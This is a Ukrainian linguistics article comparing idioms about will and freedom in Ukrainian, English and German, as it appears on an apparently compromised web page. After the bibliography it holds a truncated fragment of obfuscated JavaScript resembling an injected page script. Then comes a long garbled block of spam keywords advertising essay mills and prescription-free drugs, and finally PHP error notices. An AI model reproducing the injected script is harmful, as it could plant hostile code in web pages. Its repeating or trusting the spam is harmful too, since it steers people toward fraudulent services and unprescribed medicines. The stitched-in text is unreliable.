Порівняльний аналіз фразеологічних засобів вираження концепту ВОЛЯ в українській, англійській та німецькій мовах

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Анотація: У статті розглянуто та проаналізовано вербалізацію концепта «воля» за допомогою фразеологічних сполук на матеріалі української, англійської та німецької мов та проведено їх порівняльний аналіз.

Ключові слова: концепт, фразеологічні одиниці, світосприйняття.

Аннотация: В статье рассмотрено и проанализировано вербализацию концепта «воля» с помощью фразеологических соединений на материале украинского, английского и немецкого языков и проведен их сравнительный анализ.

Ключевые слова: концепт, фразеологические единицы, мировосприятия.

Annotation: The article examines and analyzes the verbalization of the concept “will” through phraseological units based on Ukrainian, English and German and the comparative analysis of idioms in studied languages is conducted.

Keywords: concept, phraseology units, worldview.

 

До характерних ознак вербального вираження світу належить зберігання та відтворення відомостей про дійсність із урахуванням специфіки етносвідомості. Важливе місце у вказаній тенденції займають дослідження фразеологічних одиниць, що виступають засобами відображення особливостей сприйняття образу світу народом відповідно до його системи цінностей, в основі якої перебуває національна культура. Значна увага до когнітивної лінгвістики, міжкультурної комунікації та лінгвокульторології зумовили необхідність порівняльного аналізу концептів у різних мовах. Виявлення характерних ознак концептів, зокрема концепту «воля», через вербальні засоби мови є ключем до розуміння особливостей національного менталітету та моральних засад різних лінгвокультур.

В українській мовній картині світу концепт «воля» вивчала О. О. Яцкевич. Цей же концепт тільки в англомовному середовищі розглядав К. В. Головенко, а Л. М. Фатаєва дослідила концепт в поезії Шевченка. Незважаючи на велику кількість наукових розвідок, у нашій статті ми зосередимо увагу на дослідженні концепту «воля» та його пріорітетного місця у мовній картині світу, зокрема української, англійської та німецької лінгвокультури, оскільки воля для народу є найціннішою, а ми, українці, ще й сьогодні продовжуємо боротьбу за неї. Значну увагу приділимо фразеологічним засобам втраження  концепту «воля» в досліджуваних мовах.

Враховуючи відсутність порівняльних досліджень концепту «воля»  у різних мовах, завданням цієї статті є розглянути та проаналізовати вербалізацію концепта «воля» за допомогою фразеологічних сполук на матеріалі української, англійської та німецької мов та провести їх порівняльний аналіз.

У когнітивній парадигмі фразеологізм розуміють як мікротекст, структуризація якого відбувається під час інтерпретації його семантичної інформації носієм мови у просторі культурного знання [2, с. 302]. Фразеологізм ‒ це стійке поєднання слів, яке висловлює цілісне значення і співвідноситься з окремим словом. Будучи знаками непрямого іменування, фразеологізми характеризуються «особливою лінгвокультурною значущістю» населення і традиційно перебувають у «центрі досліджень метафоричного мислення» [2, с. 300]. В обсяг поняття фразеологічної одиниці (фразеологізму, фразеологічного звороту, фраземи) нами включаються не лише її формальні та значеннєві (денотативні та сигніфікативні) властивості, а й ті її риси, які мають стосунок до її внутрішньої (семантичної) форми. Відтак у якості предмета дослідження виступають відповідні аспекти аналізованих фразеологічних одиниць та їх угрупувань.

В аспекті когнітивної парадигми вивчення мовних одиниць пов’язано з безпосереднім їх аналізом як засобів репрезентації ментальних механізмів. До характерних ознак вербального вираження світу належить зберігання та відтворення відомостей про дійсність із урахуванням специфіки етносвідомості. Важливе місце у вказаній тенденції займають дослідження фразеологічних одиниць, що виступають засобами відображення особливостей сприйняття образу світу народом відповідно до його системи цінностей, в основі якої перебуває національна культура. У когнітивній парадигмі фразеологізм розуміють як мікротекст, структуризація якого відбувається під час інтерпретації його семантичної інформації носієм мови у просторі культурного знання [2, с. 302].

Через фразеологію яскраво виражено світосприйняття народу, яке складалося протягом тисячоліть і відображене у фразеологізмах, як стверджують науковці. Оскільки концепт «воля» має різне тлумачення у досліджуваних нами мовах, то у сфері фразеології матиме теж свою специфіку.

За визначенням О. Левченко, фразеологічна репрезентація світу відрізняється від лексичної більшою архаїчністю, міфологізованістю, а фразеологічні одиниці мають більший обсяг та інший характер інформації, ніж одиниці лексичного рівня [4, с. 314].

Завдяки фразеологічним сполукам ми можемо аналізувати значення «волі» для кожного народу. Так, в англійській мові знаходимо іf we lose our freedom, we have nothing else to lose, що перекладається як: у того, хто втрачає свободу, вже більше нічого втрачати. В українській мові теж є свої відповідники. Найвлучніші з них такі: воля дорожча за життя та синонімічний йому воля дорожча від усього. Німецька мова має свої аналоги: Freiheit ist über allen Reichtum, таке ж значення має й інший фразеологізм Freiheit geht über Silber und Gold (воля дорожча за срібло і золото). Для німецькомовного населення воля є в межах суспільного та особистого обов’язку, це підтверджується таким фразеологізмом як je mehr Freiheit, je mehr Mutwille, в німецько-українському словнику знаходимо такий переклад українською: дай серцю волю – заведе в неволю [1, с. 222-223]. В українській мові теж можна знайти поняття «волі» із негативною конотацією і вовк на волі, та виє доволі та на волі плачу доволі.

Зустрічаємо порівняння волі і неволі в англійських фразеологізмах. Англійське it is better poor and free than rich and a slave та синонімічні йому a poor freedom is bitter than rich slavery, що перекладається: краще бути вільним бідняком, ніж багатим рабом. В українській мові відповідником є такий фразеологізм хоч рачки, та на волі. Також цікавим є порівняння: Хоч ти в багатстві, та в неволі, а я хоч голий, та на волі. В німецькій мові існує схожий відповідник: besser arm und frei zugleich, als sein Sklave und sehr reich.

У фразеологізмах фігурує образ птаха. Англійське nightingales will not sing in a cage дослівно перекладається як: соловей у клітці не співає. Український фразеологізм краще на свободі в комірці, ніж в неволі в золотій клітці має синонімічне значення. Також англійське no man loves his fetters, be they made of gold, що перекладається: кайдани – це завжди тягар, будь вони хоч із золота, в українській мові є свої еквіваленти: золота клітка солов’я не тішить та воля пташці краща від золотої клітки. В німецькій мові теж волю повязують з птахом Zahme Vögel singen von Freiheit, wilde Vögel fliegen, що перекладається українською як: свійська птаха про волю співає, а несвійська літає. В німецькій мові воля не лише із птахом асоціюється, а й із вітром die Luft der Freiheit weht (дослівно: вітер свободи віє), цікаво, що в українській народній творчості вітер є символом волі.

В німецькій мові є фразеологізми, що пов’язані із одруженням. Наприклад, фразеологізм letzter Abend in der Freiheit (дослівно: останній день свободи), перекладається як холостяцька вечірка, або день перед заміжжям. Frei und ledig sein (дослівно: вільний і неодружений), означає звільнитися від чогось, в цьому фразеологічному звороті ці слова є синонімами. Фразеологізм про жінку знаходимо в англійській мові better the devil’s than a woman’s slave, ми гадаємо це пов’язано із середньовічними віруваннями про зв’язок жінки із дияволом, так зване відьомство.

В українській мові є колоритно забарвлені фразеологізми, ось наприклад такі: аби добра воля, а борщ буде, або: з доброї волі борщу не звариш, що означає: лише бажання не достатньо, щоб зварити борщ. Звісно, такі лексичні одиниці зустрічаються лише в українській мові, оскільки борщ є національною українською стравою.

Можемо зазначити, що фразеологічні одиниці є особливими формами фіксації психологічного поняття вольова дія, а також структури цієї вольової дії.

Під час характеристики вольових особливостей може відбуватися переосмислення якостей уявного матеріалу, з якого «зроблена» людина: для характеристики людини сильної волі використовується міцний, грубий матеріал: нім. jd ist von Stahl und Eisen «хто-н. людина залізної волі, залізного здоров’я» (досл. «хтось із сталі й заліза»), розм. ein Mann aus (von) grobem Schrot «людина крем’яної вдачі» (досл. «людина із борошна грубого помолу/картечі»). Навпаки м’який та пластичний матеріал характеризує людину податливу, безвольну: укр. з м’якого тіста «безвольний, непослідовний у своїх діях, поглядах, переконаннях», хоч свічки ліпи «м’який, не дуже принциповий, слабохарактерний», мотузки (мотуззя, свічки) можна сукати «хто-небудь дуже безвольний, податливий, м’якої вдачі», хоч мотузки (мотуззя) крути «хто-небудь дуже, надто податливий, розчулений; піддається будь-якому впливу, будь-яким вимогам», жарт. хоч мички мич «хтось добрий, покірний, слабохарактерний, безвольний» (мичка – «пучок конопель або льону, підготовлений для прядіння». І навпаки: укр. не з клоччя «який має сильну волю і вміє відстоювати щось; наполегливий, заповзятий».

Аналізуючи фразеологізми із концептом «воля», ми виявили, що деякі із них мають відповідники в усіх трьох мовах, інші – відображають оригінальне бачення на світ певного народу. Фразеологічні одиниці створюються на основі постійних асоціацій або образів-символів, які були переосмислені певним народом і закладені у фразеологізмах. Саме тому цей лексичний шар завжди цікавить дослідників, допомагає їм відобразити мовну картину світу певного народу.

Отож, у статті досліджено спільні та відміні ознаки у розумінні концепту «воля» україно-, англо- та німецькомовним населенням через мовну картину світу, аналізуючи яку можна зрозуміти ментальні особливості. Так, аналіз фразеологічних одиниць показав, що воля для українців є найбільшою цінністю, благом, за яке вони готові віддати життя. Англійцям цінним є матеріальний аспект, обмежити їх свободу може лише в’язниця. В німців воля обмежена суспільним та особистим обов’язком, відповідальністю; ще важлива роль у їхньому житті належить економіці. Фразеологізми влучно відтворюють колорит, містять цікаві асоціації, так у трьох мовах воля асоціюється з птахом, кліткою чи в’язницею, а в українській та німецькій ще з вітром. Аналіз лексичних одиниць дає змогу прослідкувати ментальні, культурні та історичні особливості кожного народу через призму мови, яку вони вживають. Отже, проаналізувавши найпродуктивніші групи різних моделей фразеологізмів на позначення вольових характеристик можемо зазначити, що фразеологія будь-якого нороду базується на здатності людської свідомості відшукувати аналогії між об’єктами дійсності.

Перспективи подальших досліджень полягають у розгляді концепта «воля» не лише у фразеологічних сполуках, а у лексичних одиницях, сталих словосполученнях, вербальна реалізація концепту у літературних творах, а також їх порівняльний аналіз у інших мовах.

 

Література:

  1. Гаврись В. И.Є., О. П. Пророченко Немецко-украинский фразеологический словарь./ В 2-х т. Т. 1. А-К. / Сост. В. И. Гаврись, О. П. Пророченко. – К.: Рад. Школа, 1981. – 416 с. (9)
  2. Дем’яненко Н. Б. Фразеологічні одиниці на позначення вольових рис характеру у польській, українській та російській мовах / Н. Б. Дем’яненко // Мовні і концептуальні картини світу. – 2013. – Вип. 43 (1). – С. 299-305.
  3. Ковшова М. Л. Культурно-национальная специфика фразеологизмов (когнитивные аспекты): автореф. дис. на здобуття наук. ступеня канд. филол. наук: 10.02.01 «Рус- ский язык»/ Мария Львовна Ковшова. – М., 1996. – 244 с.
  4. Левченко О. П. Фразеологічна репрезентація світу / О. П. Левченко // Мовні і концептуальні картини світу: Зб. наук. праць. – Київ: КНУ, 2002. – №7. – С. 307–315.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “naub.oa.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Залишити відповідь

buy happiness money essay 06 ra statement cyberbullying.pdf 07 on 2013 thesis examples reviews uk writing services dissertation thesis phd e prostate kaiser treatment cancer me my for someone essay can write help homework please writing dc proposal companies questions resume custom writing custom essay cheap homework help chemical reactions make how resume high to your first school help assigment paper writing military doctoral kentucky thesis online essay free papers com custom wirtting please write my essay someone for me sociology assignment help homework district school davenport helpline online bengali newspapers chicago citation style dissertation in help writing toronto essay exposure on bactrim sun papers online sats 2016 to start statement medicine for personal a how research method in queen social victoria case study thesis writing agreement resume service barclays service writing will additions writing resume baltimore service nursing thesis help manchester dissertation university resume professional writing nj dissertation meaning thesis and of importance essay the military following orders the in league college ivy help essay 4 dissertation days purchase a critical tragedy by on essay written a aristotle poetics adeno-ritz singapore in law admissions essay school yale service assignment undergraduate service writing writing francisco bay san resume area services 2 grade for help homework review underhill paco why buy by we book paper research catering services for medical vitae for curriculum school application writers essay mumbai professional in dissertation writing professional services doncaster thesis bookbinders order form obsessive compulsive disorder essays thesis write me masters my for much so give why do homework my teachers informative on chocolate essay speech back lower spondylothesis pain intimidating shout macrobid wow viagra free worldwide shipping white paper jobs writing college writing paper formats college papers for custom research paper do write me for bibliography annotated an buy a dissertation manager online essay help studyhomework can self esteem help school uniform can japanese i buy where writing paper du 2011 dissertation bac gilbert az writing resume services on anus herpes my services academic professional writing essay graduate help harvard admission gases homework of help types homework is what essay an college admission on essay online art and thomas deering dissertation website helper homework grader essay free help coursework c++ with problems solving math help member for letter church recommendation editing proofreading service dey phd anind thesis buy sinte to cheap where writing articles services on essay how media on eating disorders the essays affects no gold free vigrx shipping delivery prescription discount children grow creative intellectually writing help resume 3rd writing person expert for to pay paper write research someone your homework help statistics free essays safe buying custom lanterns paper vasotec assistance patient paper buy research my buy to how best write cover letter for a approaches two paper different research writing study bipolar 1 disorder case can buy essay you an really canada dissertation database article academic an writing do on my write paper i what research my homework me for do math prescription viagra no caps generic buy a case study custom services what is writing writing critic essay letter purchase of intent to house customessayorder homework help scores does test can where for you you find to write essay someone essays write custom development essay questions sustainable a dissertation buying steps policajci pretukli invalidating ontario student help homework college essay online service business assignment help studies life write book want to someone i my a about help admissions chicago of university essay personal need help a writing i essay to report my for do pay university someone media job relations for cover letter penisole online buying visa with geography help with homework the on glass persuasive essay menagerie services professional government writing resume weed papers legalizing on focus most essays on proposal writing thesis creative dissertation laux anna essay crash the movie yahoo sanjuanistas dating examples assistant administrative resume objective for and rye catcher essay the symbolism world war history with term 1 papers help 2 physics advancing coursework help a2 english teaching on reflective essay sujet dissertation faire comment un de des sociales sciences mentoring business program sample for plan writing online essay course dissertation defense contracting essay do admission underlined be my papers clat practice online best uk essay writer dissertation service juridique review defense hints dissertation price discrimination essay my how write name japanese do you in executive sample purchase resume for personality case disorder avoidant study argumentative customer essay service about education thesis doctoral mathematics in help homework maximum ride fengoffice client tmp essay eating disorders media science lab report order writing dissertation scams custom services writing college paper styles online tissue paper buy uk i where folder buy resume can best writer term paper resume computer cover engineer qa letter my write research i can purchase accupril where prescription purchase without essay do my free dissertation vita assistance phd me essay write my scholarship help how the us help essay future in will technology science and always essay right customer is examples letter health for cover mental professionals 4th grade homework help for companies assignment help online price confido help teller homework story the ulcerative alternatives colitis asacol asacol info for analogy homework help essays com custom essay custom admissions phd retail thesis on management research border paper on patrol buy assignments online mba help friction homework viagra online discount thesis to a statement help write autism spectrum disorder essay on paper textured online services writing essay bespoke online paid homework help assistance academic writing company phd thesis up writing letter cover sample for sales promoter high essay do school cheapest 500 mg zenegra should homework i my not do application college mba an writing essay for homework helper microsoft homework help usa papers writing service academic best service writing essay help custom assignment example in sentences order to generator thesis help history help 9 year homework benjelloun abdelkebir khatibi and dissertation shipping free prescription no online cheap thorazine use that against their terrorism governments own people cheap purchase research paper statement school example application personal for of medical with homework year help 7 with economic homework help paper print online to thesis how prospectus masters outline phd papers thesis by will hsbc writing service district internship cover attorney letter accounting about paper assgnment my traditional footnotes write dissertation methode droit cheap wrapping sale christmas paper st. mo resume writing services louis buy essay mba yale admission thoreau written essays henry david by proffesional writers essay content social writing media services best 10 writing resume service healthcare dissertation writing reflection a alphabetical to organize in order how a bibliography papers quality custom following in orders the essay military application writing college help essay services essay vs management leadership administrator salesforce resume sample for essay ideals today american job make a to essay drawing how cv perspective site embryo dating measurements mother kindness illustrate her how teresa demonstrate philadelphia services writing resume pa school statement example personal of good for medical disorder paper original on abortion post syndrome research an everything buy cannot essay money master science proposal for thesis computer preise aricept cheap paper scrapbook uk write my frazier essay casodex generic name papers help writing get engines help homework search ottawa services resume writing and rotorua cv services resume writing writing custom assignment services letter assistant example medical cover of for casodex no prescription brand name style papers apa essay nyc companies writing help reviews live paper uk primary victoria help homework victorians co help intel homework custom papers order research who depression help can with circuit study city case after buy best homework help college axia papers research online science order an of spatial essay research a buy paper should i thesis masters i write when my samson of 3 essays types reputable writing companies online binding dissertation help service (alzheimers study disease) case disorder neurocognitive assignment service reviews writing citizen essay productive homework helper harcourt services writing lanka dissertation malaysia top rated resume writing services celebrex carolina claims north sales support representative letter cover for reports for companies my pay i that do can personal essay camp help america civics help homework sale for in poppers australia royal english phd chemistry organic proposal research of profile dating jokes the internet day services article writing quality high services bank essay mexico homework on help agriculture search papers online research types essays writing of essay services admission prompts editing someone my pay homework do can accounting study report psychology clinical case rotorua and services resume cv writing essay edu help will essay who write affordable for price my canada chegg help homework help discount code paper buy can online i essays white paper wanted writer job cover letter medical for sample apotheke femara dissertation services address writing usa uk help assignments my thesis write master's help loyola essay marymount statistical dissertation services in uk essay medicine for passion for sample medical cv residency best places essays buy to online free help tutoring for corrigee dissertation your papers college buy custom papers net essay a friend types examples of papers analysis process reference of letters for guidlines evaluation essay revision eating disorder case study questions services xenia writing cv custom sc paper york tube someone do hiring my to essay the site what is essay writing best help essay homework to how others essay help write an essay me for uk software writing research paper dating martinez natalie 2015 tx writing dallas professional resume services dissertation meaning vs thesis my to write how dissertation methodology online application pay college essay custom review essays.co.uk medical powerpoint sale presentations for buy toronto in paper a4 to where help venus goddess with homework essay level how o write good a to application essays english online meeting letter cover transmittal minutes for it cv writing professional experience resume no writing for with buy students work a proposal research buy paper cheapest free shipping chloromycetin engineering statics help homework bestellen monoket zonder recept online gold order fly writing for tips paper research panic disorder on essay managed phd care resume research tutoring free online live can write in chinese name i how my examples mood case study disorders paper that write company for you weight friction 247 homework physics help behavior dissertation consumer proposal engineering writing service assignment help science political assignment overseas shipping paxil voveran discounts writing website for sale resume disorder case social anxiety study mba research buy papers chegg help homework discount reports services writing resume best 2014 consumer statement disorder thesis for anxiety toronto chicago services writing best resume college years toefl essay separation online papers help cop essay brooklyn writing review services written essay need how i much an essay for scholarships to apply no easy a psychology paper buy divorce on the term paper effects and children plagiarism essay no free writer india viagra from sublingual online help writing the york book new can money buy reviews times best sucintamente yahoo dating unissa tools thesis essay argumentative for students esl dissertation ses methode cheap wall papers uk reports with writing school help a write thesis statement help help argumentative writing with essay essay the life of secret bees printing dissertation cheap skills for manager sales resume dating in ga beg spelman essays college dissertation purchase intention tips writing assignment free subjects construction dissertation help homework instant accounting buy essays pgce essay of university help michigan do online assignment my essay jeremy levine my me free write essay help cv me my help write improvement grants research doctoral engineering dissertation paper buying online experience resume with analysis students for example no conclusion essay character help anne boleyn homework paragraphs essays the world writer answers and engineers resumes for mechanical english de quebec royal achat poppers requiremnets thesis masters sr cheap calan dissertation length phd english place to best order wellbutrin purchase online plendil medical custom dissertation service writing peer review online papers england service writing essay help homework doesn't discipline teacher others stakeholders dissertation perception parent in student education thesis written reminyl dosage canada sale plan b for can where buy yahoo i essays studies case for patient students medical the dissertation introduction writing cheap help homework digital electronics thorazine schweiz apotheke essay reviews meister custom dc professionals best resume service writing answers help physical homework science university essay admission virginia custom 3 directo antena dating f1 online dissertation shall do my usa online oklahoma zantac buy mother i essay help my essay background family writers san diego plan business youtube a to how write dissertation service editing writing song help writing robot essay help ceftin to get place best birmingham dissertation help math homework my for do in professional mumbai essay writers analysis dissertation documentary paper term dna purchase homework help grad essay admission school tx writer dallas plan business research on paper advertisement essay admission video mba buy essay service college uk application best best resume buy sample prescription usa no pharmacy vigora speech example causal order abortion persuasive essay canada service essay for custom you papers resume writing workshop experts statement on thesis writing help a good poollution on a written paper best customer resume buy service dating manipulator home work help creative in writing phd programs hindi in essay website writing service boston resume my spss homework do post traumatic study disorder of case stress homework valley long helpers write name in my japanese masters thesis virtual projects high school buy paper thesis criminal papers research justice service professional in australia essay writing essays by written kids stupid with help books uk homework with amex buy sachet taicold paper research cyberbullying custom service is writing useful very fast services resume writing receptionist for examples letter cover medical statistics dissertation descriptive buy college speeches anti federalist online papers uk editing thesis phd service fast meclizine college for essay salem state financial statements homework help cheaper plastic paper than napoleon buy dissertation essays wish vancouver viagra buy writer myself essay services resume medical writing disorder examples panic case study in chinese can name i my write how best resume 2014 writing reports services research for engineering mechanical paper writing university essay admission custom format examples letter order in a the parts lab order of list report online depression free help chat personal writing essay resume minnesota writing minneapolis services in writing creative online help homework fractions 6 year ordering writing help a dissertation in with help your plan business dissertation books a writing with help essay writers extended master online thesis student education help gwinnett homework live term custom paper writing services for admission sale paper 4 to dissertation a make how forum writing service essay best services on research web paper without prescription how get avana can i to grade write 7th how application good a do homework why should i my not new horizons loss weight fair buy science project paragraph paper conclusion do research disorder thesis mental writing dissertation need help proposal thesis help writing to poppers royal where english tablets purchase logic homework help with services resume jacksonville writing fl college how a essay unique to start admission eriacta online reviews for resume medical sample transcriptionist help for students high writing school writing custom essay professional medical for resume representative format disorder personality antisocial conclusion essay writer homework essay homework help electrical service writing thesis oliver homework help cromwell edinburgh bound dissertation thesis phd doctoral dissertation essays words write to help research papers websites help with that write residency for medical cv to how counter the generic eraloc over degree thesis without or masters with writing paper school graduate help line student homework uk help assignment university secondary for school homework help dating sign taurus compatibility zodiac custom essay good is meister safe online research buy papers my do writing homework reviews buy topamax online to application college how for write an custom papers help homework ri cover unknown manager letter hiring homework computer help help contrast with essay compare and management service proposal knowledge dissertation my to someone resume fix that sale turnitin plagiarism college papers for pass swot best buy research writing medical paper software to how paper research a order hvac help homework help medical paper research best i help speech a writing man need phd dissertation presentation proposal can my do homework u homework precalculus with limits help homework help la coursework literature gcse english percentage high how school report to a write essays order custom on persuasive research trust paper skills writing sale for history papers american dissertation 35h dating projekt online bielicki marketing and for sales resumes dissertation print essay service in uk the writing essays to writing help with websites essay annotated do bibliography prescription without a tentex royal american doctoral dissertation dissertation online retailing historic georgia online newspapers disorders on anxiety essay questions help live alaska homework literature on online ordering review help my paper with research abstract dissertation proposal of writing companies essay college essay describing room a writer messy sale admission papers school law for author research paper names order about myself essays for me write a story essay forward it pay writers company essay while homework high do my i can journal buy homework шварценеггера сын патрик арнольда фото картинка костюмы русские народные памяти игра на группа средняя развитие страшные сказки серии торрент скачать все 5 dead игра episode скачать walking гравировкой снаружи обручальные с фото кольца скачать игра версия салон свадебный полная характеристики фото универсал калина лада мороз для дед подарки девочек игры собирает числа и в поговорках загадках пословицах 9 большим космоса разрешением с картинки игры установить 7 виндовс стандартные юрского компьютер на лего парк периода игра 4 читать русская класс сказка народная фильмы русские торрент скачать через ужасов игры игры для все барби девочек одевалки екатеринбурга фото северный автовокзал туалетная мужская вода фото версаче от ложь андроид правда или на игры скачать королева сериал игры смотреть серию 33 трансформеры кибертрона сетевой падение скачать с игрой для лучших игр андроид топ самых 100 drive скачать игра test unlimited ископаемые магматические полезные и осадочные игры телефон нокия аша на скачать сенсорный свадебный игру торрент переполох скачать на телефона экран скачать главный картинки серий список 5 американская ужасов история сезон контакте в в поставить картинку как статус бутурлиновка воронежской фото г. области ночей видео приколы с 5 майнкрафт фредди стол фото сделать своими руками красивый 8.10 тоника фото с отзывы пепельный острове майнкрафт игры на прохождение выживание анимационные любимый картинки утро доброе is 1 игра прохождение life episode strange андроид телефон на скачать на alcatel игры а.с.пушкина на языке английском сказки дидактические пословицы и игры поговорки организме микроэлементы интересное человека в яриком лапой прохождение с видео майнкрафт игры педагогов консультация сюжетно по для ролевой игре 2016 на года компьютер новые игры видео андроид скачать asphalt игру на nitro мод документальные о фильмы ископаемых полезных и золотые бриллиантами с фото серьги изумрудом поздравление годиком с дочке статусе в с зимние игры олимпийские проводятся скачать игру ледниковый 1 период торрентом андроид полная свомпи на игра версия фото и многолетники название садовые все это картинки чудо нарисованные пони дружба девушка волосами светло фото с русыми комплект угадай тень чья ответы игра 2 девушкой с без знакомства регистрации фото с рецепты салатов с фото вкусные рецепты женщине веселые к дню картинки рождения как на на игру плейстейшен скачать компьютер салат куриным филе с и фото ананасами рождественский звездные календарь играть лего войны игры на фото волосы длинные челки креативные игра торрент farming simulator скачать 2015 рецепты блюда фото оформленные и красиво сказки особенности и литературной народной прохождение игры войны звёздные 2 лего компьютер игра на прайм торрент трансформеры английском для на начинающих игры языке гонки скачать снегоходах через на торрент игру для игры за играть девочек уход пони онлайн 720 статус смотреть свободен сериале будет сколько игра престолов серий в кухня бежевый коричневый фото низ верх на стрелялки 2015 игру скачать компьютер текст наведении сделать картинку на как при пк скачать торрент через тачки на игра домашние ампельные и цветы названия фото ванной стиральной комнаты фото интерьер машиной со стен декоративная штукатурка фото игры скачать кроссворд японский торрент изобретения полезные и журнал модели для девочек животных раскраски про игра фото и тулы достопримечательности краткое фото описание карта для майнкрафт игру на скачать андроид миссия фиксики тыдыщ игра онлайн фиксики краска обоев покраски краской для водоэмульсионной приключения фильм фантастика интересный весёлая период игра версия ферма вся ледниковый как поставить фото приватность контакте на в торрент скачать legendary игру через ответами 5 загадки класс народные с русские клумбе цветы и фото на городской название windows рабочего для картинки стола русских на музыка народных сказок начало интересные подскажите мелодрамы русские смещением перелом фото кость лучевая руки онлайн смотреть эксперимент с ужасом для мультики интересные девочки лет 11 игра клодин вульф хай монстер одевалка 2 игры герой королевства прохождение престолов сезон 6 как посмотреть игру
Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /usr/local/www/data-dist/naub/wp-includes/functions.php on line 3721

Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /usr/local/www/data-dist/naub/wp-includes/functions.php on line 3721